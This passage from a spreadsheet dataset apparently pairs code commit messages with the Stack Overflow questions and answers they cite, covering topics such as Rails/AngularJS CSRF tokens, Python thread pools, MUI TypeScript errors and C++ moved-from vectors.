    $className = collect(explode('.', $name))-&gt;map(function($part) {
        return \Str::studly($part);
    })-&gt;join('\\');
    $className = "App\\View\\Components\\{$className}";
    if(class_exists($className)) {
        $reflection = (new \ReflectionClass($className))-&gt;getConstructor();
        $parameters = [];
        foreach ($reflection-&gt;getParameters() as $param) {
            $parameters[] = $props[$param-&gt;name] ?? $param-&gt;getDefaultValue();
        }
        $component = new $className(...$parameters);
        $component-&gt;withAttributes($attributes);
        return $component-&gt;render()-&gt;with($component-&gt;data());
    }
    $props['attributes'] = new \Illuminate\View\ComponentAttributeBag($attributes);
    return view("components.$name", $props);
}
Usage
viewComponent('input', [
    'name' =&gt; 'name',
    'title' =&gt; 'My Field',
]);
// if you want custom attribute
viewComponent('input', [
    'name' =&gt; 'name',
    'title' =&gt; 'My Field',
], [
    'autocomplete' =&gt; 'off',
    'data-custom' =&gt; 'custom attribute',
]);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a program in rust to do two things: apply a night mode filter and apply a &amp;quot;black&amp;quot; filter to simulate a decrease on the level of bringtnes.&lt;/p&gt;
&lt;p&gt;I made a function similar to this one (i've lost the original one) using low level windows APIs but it only works with one display only... Do you have any suggestion?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fn apply_filter_by_temperature(brightness: u32, color_temperature: u32) {
    println!(
        &amp;quot;Applying filter: Brightness {} - Temperature {}K&amp;quot;,
        brightness, color_temperature
    );
    let (r_adj, g_adj, b_adj) = get_warm_light_rgb(color_temperature);
    unsafe {
        let hdc = GetDC(null_mut());
        if hdc.is_null() {
            eprintln!(&amp;quot;Error retriving HDC&amp;quot;);
            return;
        }
        let mut gamma_ramp: [u16; 256 * 3] = [0; 256 * 3];
        for i in 0..256 {
            let factor = brightness as f64 / 255.0;
            // normalize rgb values
            let r_factor = r_adj as f64 / 255.0;
            let g_factor = g_adj as f64 / 255.0;
            let b_factor = b_adj as f64 / 255.0;
            // apply filters
            let r = (i as f64 * factor * r_factor) as u16 * 256;
            let g = (i as f64 * factor * g_factor) as u16 * 256;
            let b = (i as f64 * factor * b_factor) as u16 * 256;
            gamma_ramp[i] = r.min(65535);
            gamma_ramp[i + 256] = g.min(65535);
            gamma_ramp[i + 512] = b.min(65535);
        }
        if SetDeviceGammaRamp(hdc, gamma_ramp.as_ptr() as *mut _) == 0 {
            eprintln!(&amp;quot;Error during SetDeviceGammaRamp&amp;quot;);
        }
        ReleaseDC(null_mut(), hdc);
    }
}
fn get_warm_light_rgb(temperature: u32) -&amp;gt; (u8, u8, u8) {
    match temperature {
        6500 =&amp;gt; (255, 255, 255),
        5000 =&amp;gt; (255, 228, 206),
        4500 =&amp;gt; (255, 213, 181),
        4000 =&amp;gt; (255, 197, 158),
        3500 =&amp;gt; (255, 180, 136),
        3000 =&amp;gt; (255, 165, 114),
        2700 =&amp;gt; (255, 152, 96),
        2500 =&amp;gt; (255, 138, 76),
        2000 =&amp;gt; (255, 120, 50),
        1800 =&amp;gt; (255, 109, 35),
        _ =&amp;gt; (255, 255, 255),
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C414</t>
  </si>
  <si>
    <t>add: dependency checker component
https://stackoverflow.com/questions/33297857/how-to-check-dependency-in-bash-script</t>
  </si>
  <si>
    <t>You can use the command bash builtin:
if command -v nodejs &gt;/dev/null 2&gt;&amp;1 ; then
    echo "nodejs found"
    echo "version: $(nodejs -v)"
else
    echo "nodejs not found"
fi</t>
  </si>
  <si>
    <t xml:space="preserve">What is the difference between a framework and an SDK?  Take, for example, the MS platform SDK and the .NET framework.  Both have API's, both hide their inner workings, and both provide functionality that may not be quickly/easily accessible otherwise (in other words, they serve a real-world purpose).
So what's the difference?  Is it primarily a marketing game of semantics, or are there actual differences in how developers are expected to interact with the software (and conversely, how the developers can expect the software to behave)?  Is one expected to be higher- or lower-level than the other, etc?
Thanks!
EDIT: This question applies to SDKs and frameworks in general, not just the two mentioned above.
</t>
  </si>
  <si>
    <t>C415</t>
  </si>
  <si>
    <t>Fix(web-react): Icon component supports SSR
  * `dangerouslySetInnerHtml` do not work while rendering on server
  * this `Warning: Prop `dangerouslySetInnerHTML` did not match.` error
    was raised
  * we can avoid this by wrapping the component with something like
    `&lt;NoSsr&gt;`
  * @see: https://stackoverflow.com/questions/64079321/react-tooltip-and-next-js-ssr-issue
  * or by using some library like ReactHtmlParser to render HTML string
    magically as a component
  * @see: https://www.npmjs.com/package/react-html-parser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to extend this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;df = df.select(
  pl.col(&amp;quot;x1&amp;quot;).map_batches(custom_function).alias(&amp;quot;new_x1&amp;quot;)
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;df = df.select(
  pl.col(&amp;quot;x1&amp;quot;,&amp;quot;x2&amp;quot;).map_batches(custom_function).alias(&amp;quot;new_x1&amp;quot;, &amp;quot;new_x2&amp;quot;)
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or the way to go is doing it one by one&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;df = df.select(
  pl.col(&amp;quot;x1&amp;quot;).map_batches(custom_function).alias(&amp;quot;new_x1&amp;quot;)
  pl.col(&amp;quot;x2&amp;quot;).map_batches(custom_function).alias(&amp;quot;new_x2&amp;quot;)
)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C416</t>
  </si>
  <si>
    <t>[TS] Use ReactElement instead of ReactNode for InfoPanel (#8959)
This prevents errors about "ReactNode is not a valid JSX element"
similar to https://stackoverflow.com/questions/72392225/reactnode-is-not-a-valid-jsx-element
The component always returns a single element, so changing the
return from ReactNode to ReactElement is more descriptive at any
rate.</t>
  </si>
  <si>
    <t>Why is ReactNode not valid JSX ?? =&gt; https://stackoverflow.com/a/72353143/10146901
and how can I solve this issue? =&gt; Just Return JSX.Element as function return type.
function buildCell({ value }: { value: string }): JSX.Element { // ... my codes }
Solution of your codesandbox</t>
  </si>
  <si>
    <t xml:space="preserve">I have an existing asp.net webforms project that uses Microsoft's Enterprise DAAB for the DAL, I need to implement some extensive features, and I would like to use NHibernate to make things easier.
Is there any design patterns/architectures out there that allow a hybrid DAAB/NHibernate DAL ? is it a good idea ?
My thinking is: if I had a hybrid DAL I could still pass high traffic/un-dynamic queries through the DAAB side and save the overhead of the dynamic sql generation. But still have nhibernate for more complex queries.
Additionally what is the best way to setup NHibernate DAL/BLL for an asp.net webforms application ? I have read the tutorial on the NHibernate site and several others there doesn't seem to be a consensus on starting/ending the nhib session. I'm just looking for best practice example.
Thanks
</t>
  </si>
  <si>
    <t>C417</t>
  </si>
  <si>
    <t>Fixed weird typescript complex union type bug.
Adding component='div' to mui Box component fixes it.
It has to do some some type confusion with @mui/box and @react-three/drei/box.
https://stackoverflow.com/questions/68692230/ts-expression-produces-a-union-type-that-is-too-complex-to-represent-with-materi/69348340#69348340</t>
  </si>
  <si>
    <t>Solution 1
The stable version of MaterialUI fix this problem.
Use this package:
npm install @mui/material
Solution 2 by Vivere
Add the component props to a div to avoid TypeScript error.
&lt;Box component="div"&gt;...&lt;/Box&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Playersprite (currently a darkgreen 64x32 rect), thats a Texture2D and a generated map, stored in a Texture2D the size of the window, generated usiong perlin noise&lt;/p&gt;
&lt;p&gt;If i draw the map i cant see the Player, if i dont draw the map i see the player, but i want to draw both at the same time.&lt;/p&gt;
&lt;p&gt;engine.Begindrawing just begins drawmode and clears the screen, engine.EndDrawing just ends draw mode.&lt;/p&gt;
&lt;p&gt;for Debugging im also drawing a Green Square.&lt;/p&gt;
&lt;p&gt;the code(main.go):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package main
import (
    &amp;quot;image/color&amp;quot;
    &amp;quot;math&amp;quot;
    &amp;quot;math/rand&amp;quot;
    noise &amp;quot;github.com/aquilax/go-perlin&amp;quot;
    rl &amp;quot;github.com/gen2brain/raylib-go/raylib&amp;quot;
    engine &amp;quot;github.com/noschXL/Game/code/Engine&amp;quot;
)
func generateMap(seed int64, mapsize engine.Vector2D, gamemap rl.RenderTexture2D) (rl.RenderTexture2D, int32) {
    Gamenoise := noise.NewPerlin(1.8, 2, 8, seed)
    rl.BeginTextureMode(gamemap)
    var whitepixels int32 = 0
    for i := 0.0; i &amp;lt; float64(mapsize.X); i++ {
        for j := 0.0; j &amp;lt; float64(mapsize.Y); j++ {
            brightness := math.Round(Gamenoise.Noise2D(i/float64(mapsize.X), j/float64(mapsize.Y)) * 255)
            if brightness &amp;lt; 100 {
                brightness = 0
            } else {
                brightness = 255
                whitepixels += 1
            }
            rl.DrawPixel(int32(i), int32(j), color.RGBA{uint8(brightness), uint8(brightness), uint8(brightness), 255})
        }
    }
    return gamemap, whitepixels
}
func main() {
    winsize := engine.Vector2D{X: 1280, Y: 920}
    engine.Initialize(winsize, &amp;quot;Sole Survivor&amp;quot;, 120)
    running := true
    defer rl.CloseWindow()
    engine.BeginDrawing()
    var tries int32 = 1
    var valid bool = false
    var whitepixel int32 = 0
    minwhitepx := int32(winsize.X) * int32(winsize.Y) / 8
    var gamemap rl.RenderTexture2D = rl.LoadRenderTexture(1280, 920)
    var seed int64 = 0
    for ; tries &amp;lt;= 30 &amp;amp;&amp;amp; valid == false; tries++ {
        whitepixel = 0
        seed = rand.Int63()
        println(&amp;quot;on try: &amp;quot;, tries)
        gamemap, whitepixel = generateMap(seed, winsize, gamemap)
        valid = int32(whitepixel) &amp;gt; minwhitepx
    }
    println(&amp;quot;seed for this map: &amp;quot;, seed)
    rl.EndTextureMode()
    player := engine.NewPlayer(winsize.X/2, winsize.Y/2, 0)
    sprite := engine.LoadPlayerSprite(engine.AppendFilePath(engine.GetPath(), []string{&amp;quot;data&amp;quot;, &amp;quot;img&amp;quot;, &amp;quot;Entitys&amp;quot;, &amp;quot;Player&amp;quot;, &amp;quot;player.png&amp;quot;}))
    for running {
        deltatime := rl.GetFrameTime()
        // Update
        engine.UpdatePlayer(&amp;amp;player, deltatime)
        // Draw
        engine.BeginDrawing()
        rl.BindImageTexture()
        rl.DrawTexture(gamemap.Texture, 0, 0, rl.White)
        rl.DrawRectangle(int32(player.Position.X), int32(player.Position.Y), 50, 50, rl.Green)
        rl.DrawTexture(sprite, int32(player.Position.X), int32(player.Position.Y), rl.Green)
        engine.EndDrawing()
        //Other Logic
        if rl.WindowShouldClose() {
            running = false
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the full code can be found at &lt;a href="https://github.com/noschXL/Game" rel="nofollow noreferrer"&gt;https://github.com/noschXL/Game&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I tried changing the the textures alpha color, it made the map slightly seethrough, did not let me see the playersprite.&lt;/p&gt;
&lt;p&gt;Changed the tint of the playersprite, didnt let me se it&lt;/p&gt;
&lt;p&gt;Changed the order of the drawcalls, didnt let me see it&lt;/p&gt;
&lt;p&gt;tried drawing one texture, ending the drawcall, start a new one, draw the player.
Result: the screen Draws the map and goes black and so on repeatedly, didnt see the playersprite.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C418</t>
  </si>
  <si>
    <t>Refactored to remove shuffle on array to create and reuse existing Random instances ( http://stackoverflow.com/a/2773866/153797 ).</t>
  </si>
  <si>
    <t>While you can use rand(42-10) + 10 to get a random number between 10 and 42 (where 10 is inclusive and 42 exclusive), there's a better way since Ruby 1.9.3, where you are able to call:
rand(10...42) # =&gt; 13
Available for all versions of Ruby by requiring my backports gem.
Ruby 1.9.2 also introduced the Random class so you can create your own random number generator objects and has a nice API:
r = Random.new
r.rand(10...42) # =&gt; 22
r.bytes(3) # =&gt; "rnd"
The Random class itself acts as a random generator, so you call directly:
Random.rand(10...42) # =&gt; same as rand(10...42)
Notes on Random.new
In most cases, the simplest is to use rand or Random.rand. Creating a new random generator each time you want a random number is a really bad idea. If you do this, you will get the random properties of the initial seeding algorithm which are atrocious compared to the properties of the random generator itself.
If you use Random.new, you should thus call it as rarely as possible, for example once as MyApp::Random = Random.new and use it everywhere else.
The cases where Random.new is helpful are the following:
you are writing a gem and don't want to interfere with the sequence of rand/Random.rand that the main programs might be relying on
you want separate reproducible sequences of random numbers (say one per thread)
you want to be able to save and resume a reproducible sequence of random numbers (easy as Random objects can marshalled)</t>
  </si>
  <si>
    <t xml:space="preserve">An upcoming project of mine is considering a design that involves (what I'm calling) "abstract entity references". It's quite a departure from a more common data model design, but it may be necessary to achieve the flexibility we want. I'm wondering if other architects have experience with systems like this and where the caveats are.
The project has a requirement for a to control access to various entities (logically: business objects; physically: database rows) by various people. For example, we might want to create rules like:
User Alice is a member of Company Z
User Bob is the manager of Group Y, which has users Charlie, Dave, and Eve.
User Frank may enter data for [critical business object] X, and also the [critical business objects] in [critical business object group] U.
User George is not a member of Company T but may view the reports for Company T.
The idea is that we have a lot of different securable objects, roles, groups, and permissions, and we want a system to handle this. Ideally this system would require little to no coding for new situations once it's launched; it should be very flexible.
In a "traditional" data design, we might have entities/tables like this:
User
Company
User/Company Cross-Reference
UserGroup
User/UserGroup Cross-Reference
CBO ("Critical Business Object")
User/CBO Cross-Reference
CBOGroup
User/CBOGroup Cross-Reference
CBO/CBOGroup Cross-Reference
ReportAccess, which is a cross-reference between User and Company specifically for access to reports
Note the big number of cross-reference tables. This system isn't terribly flexible as any time we want to add a new means of access we'd need to introduce a new cross-reference table; that, in turn, means additional coding.
The proposed system has all of the major entities (User, Company, CBO) reference a value in a new table called Entity. (In the code we'd probably make all of these entities subclasses of an Entity superclass). Then there's two additional tables that reference Entity
 * Group, which is also an Entity "subclass". 
 * EntityRelation, which is a relation between two entities of any type (including Group). This will probably also have some sort of "Relationship Type" field to explain/qualify the relationship.
This system, at least at first glance, looks like it would meet a lot of our requirements. We might introduce new Entities down the road, but we'd never need to do additional tables to handle the grouping and relationships between these entities, because Group and EntityRelation can already handle that.
I'm concerned, however, whether this might not work very well in practice. The relationships between entities would become very complex and might be very hard for people (users and developers alike) to understand them. Also, they'd be very recursive; this would make things more difficult for our SQL-dependent report writing staff.
Does anyone have experiences with a similar system?
</t>
  </si>
  <si>
    <t>C419</t>
  </si>
  <si>
    <t>Currently, datalayers are parsed and written via JSON macro, which is simple, but does not allow for great flexibility. E.g. when adding new properties, these have to options, so that existing datasource-properties.json can still be read.
Therfore, the JSON formatting should be done manually (cmp. https://stackoverflow.com/questions/45496635/play-framework-json-reads-from-empty-string-to-empty-list)
This could also allow a full backwards-compatible renaming of scale to voxelSize</t>
  </si>
  <si>
    <t>Thanks @millhouse answer, it definitely works. Like he said we need a custom Reads[Person] to properly convert it.
I also post my code as reference.
  implicit val personJsonReads: Reads[Person] = (
      (__ \ "name").read[String] and
      (__ \ "hobbies").read[List[Hobby]].orElse(Reads.pure(List())) 
  ) (Person.apply _)
read[List[Hobby]].orElse(Reads.pure(List())) will generate the empty list when the value cannot convert to List[Hobby].</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;import time
import threading
from pygame import mixer
from pygame.mixer import Sound
def play_audio_on_mic(audio_file_name):
    def play_audio():
        mixer.init(devicename = 'CABLE Input (VB-Audio Virtual Cable)')
        mixer.music.load(audio_file_name)
        mixer.music.play()
        while mixer.music.get_busy():
            time.sleep(1)
    threading.Thread(target=play_audio).start()
    audio = Sound(audio_file_name)
    return round(audio.get_length())
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Listening to the audio normally before playback, I can tell the quality is impeccable. However, when I play this audio through my virtual microphone using this Python script and VB Cable, the sound quality deteriorates it becomes distorted and strange. You can still understand what is being said, but the quality isn't reliable. Since I'll be playing many audio files and real people will be listening to them, I'm concerned that some recordings might end up with even worse distortions.&lt;/p&gt;
&lt;p&gt;I don't understand why so few people on the internet have projects like this. I thought it would be a well-documented topic, but I'm probably dealing with something that hasnâ€™t been widely explored in Python. It's actually a bit hard for me to believe, considering how extensively Python is used!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C42</t>
  </si>
  <si>
    <t>The angularjs client reads the CSRF token that must be sent with AJAX
 requests from a cookie, instead of reading it from a meta tag in the DOM.
To protect from CSRF attacks, the client must send a valid CSRF token with POST, PUT or DELETE http requests. This token is a value set by the server which is associated with the Rails session, and does not change during the session lifetime.
Previous to this commit, the token was embedded in the DOM; specifically the &lt;%= csrf_meta_tags %&gt; in layouts/_header.html.erb outputs a &lt;meta name="csrf-token"&gt; tag in the html &lt;head&gt;; the content of this meta tag is the CSRF token. The angularjs client read this token from the DOM on application initialization (see ng-modules/ng-app.js.coffee) and then sent it on each AJAX request in the X-CSRF-Token http header. Rails expects this header for POST/PUT/DELETE requests and the protect_from_forgery filter in application_controller.rb validates that the token sent matches the one stored in the session.
However this poses a problem in our app, which uses the devise-rememberable module. This module sets a persistent "remember_user_token" cookie; if a user tries to access the app with a timed-out rails session but the "remember_user_token" cookie is valid, a new Rails session is transparently created for him. The result is that when the user reopens the browser after a long time, he's still logged in into the app, which is generally desirable (the user has the option to disable this behavior by unchecking the "remember me" checkbox in the login form).
In our app, this means that if the user has a new session transparently created by devise-rememberable, he's still seeing an HTML page with the old CSRF token embedded, because no page reload will happen. The old CSRF token is no longer valid, because the Rails session he's using now is a different one than the one from when the page was sent to him. The user will be able to see feeds and even see entries in any feed, because those are retrieved via GET AJAX requests (the CSRF token is not validated for GET requests, because they should be idempotent and never change data in the server). However as soon as he opens any entry, an AJAX POST will be sent  (to change the entry state to "read"); the CSRF validation will fail, an HTTP 401 will be sent and the user will be redirected to the login page.
The conclusion is that the CSRF token embedded in the DOM cannot be trusted, because thanks to Devise-rememberable it may have been generated during an already expired Rails session, and no longer be valid.
The fix is twofold:
- The server sets a cookie with each request, storing the CSRF token in the cookie. This is safe against CSRF attacks because only javascript sent by our app can read the cookie (it would be vulnerable to XSS attacks, though). The XSRF-TOKEN name is used for the cookie because it's the one expected by AngularJS, and no extra configuration is needed in the client to make it send the value in an HTTP header during each subsequent request. If the client ever sends an invalid XSRF-TOKEN cookie, the server will send back the correct cookie value, and as long as the client sends the correct cookie it won't be sent again by the server; this is normal cookies behavior and is not considered an error.
- The angularjs client reads the XSRF-TOKEN cookie and sends it in an HTTP header with each AJAX request. AngularJS does this by default if the cookie is present, without need for configuration. The only change in config necessary is to change the name that AngularJS uses by default for the header, "X-XSRF-TOKEN", to the header name expected by the protect_from_forgery Rails filter, "X-CSRF-Token".
With this change when the user opens the browser after a long time, if the first AJAX request performed is a GET, Devise-rememberable will create a new Rails session and the new CSRF token will be sent as a cookie in the response, so that the correct token is sent in subsequent requests. The token used in this first GET will be old and no longer valid, but the CSRF token in the HTTP header is not validated for GET requests, and the invalid value in the cookie will mean that the server will just respond with the correct cookie value, instead of being treated as an error. This way the user will be able to transparently resume using the app.
I estimate that in most cases the first action from a user will be an AJAX GET (either get the list of entries for a feed/folder, or an automated refresh of feeds/folders). In the rare cases in which the first action from a user is to generate a POST/PUT/DELETE (e.g. open an entry) the behavior will be as above (the user will be redirected to the login form). This should be rare but I may have to address it in the future.
I'm keeping the CSRF token in the &lt;meta&gt; tags because I currently see no value to remove it and it could cause problems with some non-AJAX forms.
To read more about angularJS handling of CSRF tokens in cookies:
https://docs.angularjs.org/api/ng/service/$http#description_security-considerations_cross-site-request-forgery-protection
To read interesting discussions about this topic:
http://stackoverflow.com/questions/14734243/rails-csrf-protection-angular-js-protect-from-forgery-makes-me-to-log-out-on
http://stackoverflow.com/questions/11845500/rails-devise-authentication-csrf-issue</t>
  </si>
  <si>
    <t>I think reading CSRF-value from DOM is not a good solution, it's just a workaround.
Here is a document form angularJS official website http://docs.angularjs.org/api/ng.$http  :
Since only JavaScript that runs on your domain could read the cookie, your server can be assured that the XHR came from JavaScript running on your domain.
To take advantage of this (CSRF Protection), your server needs to set a token in a JavaScript readable session cookie called XSRF-TOKEN on first HTTP GET request. On subsequent non-GET requests the server can verify that the cookie matches X-XSRF-TOKEN HTTP header
Here is my solution based on those instructions:
First, set the cookie:
# app/controllers/application_controller.rb
# Turn on request forgery protection
protect_from_forgery
after_action :set_csrf_cookie
def set_csrf_cookie
  cookies['XSRF-TOKEN'] = form_authenticity_token if protect_against_forgery?
end
Then, we should verify the token on every non-GET request.Since Rails has already built with the similar method, we can just simply override it to append our logic:
# app/controllers/application_controller.rb
protected
  # In Rails 4.2 and above
  def verified_request?
    super || valid_authenticity_token?(session, request.headers['X-XSRF-TOKEN'])
  end
  # In Rails 4.1 and below
  def verified_request?
    super || form_authenticity_token == request.headers['X-XSRF-TOKEN']
  end</t>
  </si>
  <si>
    <t>Jimbo did an awesome job explaining the "why" behind the issue you're running into. There are two approaches you can take to resolve the issue:
(As recommended by Jimbo) Override Devise::SessionsController to return the new csrf-token:
 class SessionsController &lt; Devise::SessionsController
   def destroy # Assumes only JSON requests
     signed_out = (Devise.sign_out_all_scopes ? sign_out : sign_out(resource_name))
     render :json =&gt; {
         'csrfParam' =&gt; request_forgery_protection_token,
         'csrfToken' =&gt; form_authenticity_token
     }
   end
 end
And create a success handler for your sign_out request on the client side (likely needs some tweaks based on your setup, e.g. GET vs DELETE):
    signOut: function() {
      var params = {
        dataType: "json",
        type: "GET",
        url: this.urlRoot + "/sign_out.json"
      };
      var self = this;
      return $.ajax(params).done(function(data) {
        self.set("csrf-token", data.csrfToken);
        self.unset("user");
      });
    }
This also assumes you're including the CSRF token automatically with all AJAX requests with something like this:
    $(document).ajaxSend(function (e, xhr, options) {
      xhr.setRequestHeader("X-CSRF-Token", MyApp.session.get("csrf-token"));
    });
Much more simply, if it is appropriate for your application, you can simply override the Devise::SessionsController and override the token check with skip_before_filter :verify_authenticity_token.</t>
  </si>
  <si>
    <t xml:space="preserve">For a typical business application, should the focus be on client processing via AJAX i.e. pull the data from the server and process it on the client or would you suggest a more classic ASP.Net approach with the server being responsible for handling most of the UI events? I find it hard to come up with a good 'default architecture' from which to start. Maybe someone has an open source example application which they could recommend.
</t>
  </si>
  <si>
    <t>C420</t>
  </si>
  <si>
    <t>Executor spawn threading.Thread directly instead of ThreadPoolExecutor
ThreadPoolExecutor always runs the worker threads as daemon=False and
even installs an atexit handler to join all of the workers. So afaict
it is impossible to exit the process if a thread has hung forever due
to a bug; you have to have an separate process sidecar/supervisor
thing to SIGKILL it. But we actually want to die on a watchdog
timeout.
https://stackoverflow.com/questions/49992329/the-workers-in-threadpoolexecutor-is-not-really-daemon
python/cpython#83993
We can revisit at such time we become cpu bound on spawning new
threads every time vs reusing!
Adjacent changes:
- Executor.submit() do not check_watchdog()
- router and gateway install heartbeat functions with hypercorn_main
  to do that instead</t>
  </si>
  <si>
    <t>Suddenly... I found why. According to much more source code of ThreadPoolExecutor:
# Workers are created as daemon threads. This is done to allow the interpreter
# to exit when there are still idle threads in a ThreadPoolExecutor's thread
# pool (i.e. shutdown() was not called). However, allowing workers to die with
# the interpreter has two undesirable properties:
#   - The workers would still be running during interpreter shutdown,
#     meaning that they would fail in unpredictable ways.
#   - The workers could be killed while evaluating a work item, which could
#     be bad if the callable being evaluated has external side-effects e.g.
#     writing to a file.
#
# To work around this problem, an exit handler is installed which tells the
# workers to exit when their work queues are empty and then waits until the
# threads finish.
_threads_queues = weakref.WeakKeyDictionary()
_shutdown = False
def _python_exit():
    global _shutdown
    _shutdown = True
    items = list(_threads_queues.items())
    for t, q in items:
        q.put(None)
    for t, q in items:
        t.join()
atexit.register(_python_exit)
There is an exit handler which will join all unfinished worker...</t>
  </si>
  <si>
    <t xml:space="preserve">Do you always lean towards thinking of db schema when starting or planning a new project it or do you go the other way and start designing UI then moving down the stack?
Or do you have a different way of developing?
Not really an agile/waterfall/specs/stories question just a way of getting a handle on which way people lean when working on projects personal/professional or otherwise.
I have decided that both are the best ways in the past and am currently in the UI first camp but that can and will change!
Cheers
John
</t>
  </si>
  <si>
    <t>C421</t>
  </si>
  <si>
    <t>reused RecyclerTouchListener - using instanceof
items of rv gets deleted when swiped to left
Instead of snackbar and undo, used showactionsdialog
https://stackoverflow.com/questions/31787272/android-recyclerview-itemtouchhelper-revert-swipe-and-restore-view-holder
jimmy051
modified launcher icon
final revision
determining price of product won't be possible for now</t>
  </si>
  <si>
    <t>After some random poking I found a solution. Call
notifyItemChanged
on you adapter. This will make the swiped out view animate back into it's original position.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a release pipeline that allows me to automatically update the test results in a Test plan. I run the tests through nunit-console-runner in a build pipeline. I have already successfully built a build pipeline that runs tests and reads off results. This is the YAML for that pipeline:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pool:
  name: YourAgentPoolName
  demands:
  - msbuild
  - visualstudio
  - vstest
variables:
  BuildConfiguration: 'Release'
  BuildPlatform: 'any cpu'
steps:
- task: UseDotNet@2
  displayName: 'Use .NET Core sdk 7.0.x'
  inputs:
    version: 7.0.x
- task: NuGetToolInstaller@0
  displayName: 'Use NuGet 4.4.1'
  inputs:
    versionSpec: 4.4.1
- task: NuGetCommand@2
  displayName: 'NuGet restore'
- task: VSBuild@1
  displayName: 'Build solution **\*.sln'
  inputs:
    msbuildArgs: '/p:Configuration=$(BuildConfiguration) /p:Platform=&amp;quot;$(BuildPlatform)&amp;quot; /p:OutputPath=$(Build.ArtifactStagingDirectory)'
    platform: '$(BuildPlatform)'
    configuration: '$(BuildConfiguration)'
    clean: true
- script: |
   set PATH=%PATH%;C:\ProgramData\chocolatey\bin
         choco install nunit-console-runner -y
  displayName: 'Install nunit-console-runner'
- script: |
       if exist &amp;quot;C:\Program Files (x86)\NUnit.org\nunit-console\nunit3-console.exe&amp;quot; (
         echo âœ… NUnit is installed correctly.
       ) else (
         echo âŒ NUnit is NOT installed! Check the installation.
         exit 1
       )
  displayName: 'Verify NUnit Installation'
- script: |
   echo &amp;quot;Checking for test DLL in build output...&amp;quot;
   dir $(Build.ArtifactStagingDirectory) /s /b | findstr &amp;quot;YourTestProject.dll&amp;quot;
  displayName: 'Verify DLL Location'
- script: |
   cd &amp;quot;C:\Program Files (x86)\NUnit.org\nunit-console&amp;quot;
   nunit3-console.exe $(Build.ArtifactStagingDirectory)\YourTestProject.dll --where &amp;quot;$(FeaturesToTest)&amp;quot;
  displayName: 'Run NUnit Tests'
  continueOnError: true
- task: PublishTestResults@2
  displayName: 'Publish Test Results'
  inputs:
    testResultsFormat: NUnit
    testResultsFiles: '**/TestResult.xml'
    searchFolder: '$(Build.SourcesDirectory)'
    mergeTestResults: true
- task: PublishPipelineArtifact@1
  displayName: 'Publish Pipeline Artifact'
  inputs:
    targetPath: '$(Build.SourcesDirectory)'
    artifact: XmlLogsArtifact
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to make a release pipeline that makes it where you can go to a Test Plan, click on the tests you want to update the status of, click&lt;/p&gt;
&lt;p&gt;Execute &amp;gt; Run With Options &amp;gt; Automated tests using release stage&lt;/p&gt;
&lt;p&gt;to update the results. This is the YAML for each task in my release pipeline so far.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;steps:
- task: DownloadPipelineArtifact@2
  displayName: 'Download Test Artifacts'
  inputs:
    artifactName: XmlLogsArtifact
    targetPath: '$(System.ArtifactsDirectory)'
steps:
- task: petergroenewegen.PeterGroenewegen-Xpirit-Vsts-Build-InlinePowershell.Xpirit-Vsts-Build-InlinePowershell.InlinePowershell@1
  displayName: 'What are certain things'
  inputs:
    Script: |
     Write-Host &amp;quot;System.ArtifactsDirectory: $(System.ArtifactsDirectory)&amp;quot;
     Write-Host &amp;quot;Agent.TempDirectory: $(Agent.TempDirectory)&amp;quot;
     Write-Host &amp;quot;System.DefaultWorkingDiretory: $(System.DefaultWorkingDirectory)&amp;quot;
     Get-ChildItem -Path &amp;quot;$(System.ArtifactsDirectory)&amp;quot; -Recurse
steps:
- task: VisualStudioTestPlatformInstaller@1
  displayName: 'Visual Studio Test Platform Installer'
steps:
- task: VSTest@2
  displayName: 'VsTest - testAssemblies'
  inputs:
    testAssemblyVer2: '**/Trintech.Tests.Cadency.dll'
    searchFolder: '$(Build.ArtifactStagingDirectory)'
    resultsFolder: TestResult.xml
    runOnlyImpactedTests: false
    runTestsInIsolation: true
  continueOnError: true
steps:
- task: PublishTestResults@2
  displayName: 'Publish Test Results **/TestResult.xml'
  inputs:
    testResultsFormat: NUnit
    testResultsFiles: '**/TestResult.xml'
    searchFolder: '$(System.ArtifactsDirectory)'
    mergeTestResults: true
    failTaskOnMissingResultsFile: true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've had the release pipeline deploy successfully, but it will fail at the &amp;quot;Validating stage&amp;quot; when it runs. The error it currently gives is &amp;quot;The selected stage does not have the right version or settings of the Visual Studio Test task to run tests.&amp;quot;&lt;/p&gt;
&lt;p&gt;Do I need the VsTest task at all? I thought no, because I don't want to rerun the same tests twice. But the only time I've had this work was when I was doing that. When I remove that task, I get the same error. Please help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C422</t>
  </si>
  <si>
    <t>Explicitly clear reused std::vector and u16string after moved from
MSVC C26800 warned us std::vector and std::string are not guaranteed to
be cleared after being moved from in all standard C++ implementations.
As we reuse those objects and rely they are cleared, do an explicit
clear. We could have one-time-use objects and add scopes, but that makes
code ugly.
Reference: https://stackoverflow.com/a/17735913/2071884
Signed-off-by: Simon Rozman &lt;simon@rozman.si&gt;</t>
  </si>
  <si>
    <t>I'm coming to this party late, and offering an additional answer because I do not believe any other answer at this time is completely correct.
Question:
Is a moved-from vector always empty?
Answer:
Usually, but no, not always.
The gory details:
vector
has no standard-defined moved-from state like some types do (e.g.
